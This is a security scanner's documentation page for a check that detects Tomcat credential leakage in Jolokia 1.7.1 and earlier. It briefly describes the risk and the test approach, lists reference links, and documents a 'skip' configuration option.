Access Control: Jolokia \<= 1.7.1 Information Leakage¶
Identifier:
jolokia_tomcat_creds_leak
Scanner(s) Support¶
| GraphQL Scanner | REST Scanner | WebApp Scanner | ASM Scanner |
|---|---|---|---|
Description¶
Jolokia \<= 1.7.1 information leakage vulnerabilities can expose Tomcat credentials, potentially leading to remote code execution via WAR upload.
How we test: We test for information leakage vulnerabilities in Jolokia by attempting to access information disclosure endpoints and analyzing responses to detect if Tomcat credentials are exposed that could be used for remote code execution.
Reference:
- https://github.com/laluka/jolokia-exploitation-toolkit/blob/main/exploits/info-leak-tomcat-creds.py
- https://therealcoiffeur.github.io/c11011
Configuration¶
Example¶
Example configuration:
Reference¶
skip¶
Type : boolean
Skip the test if true.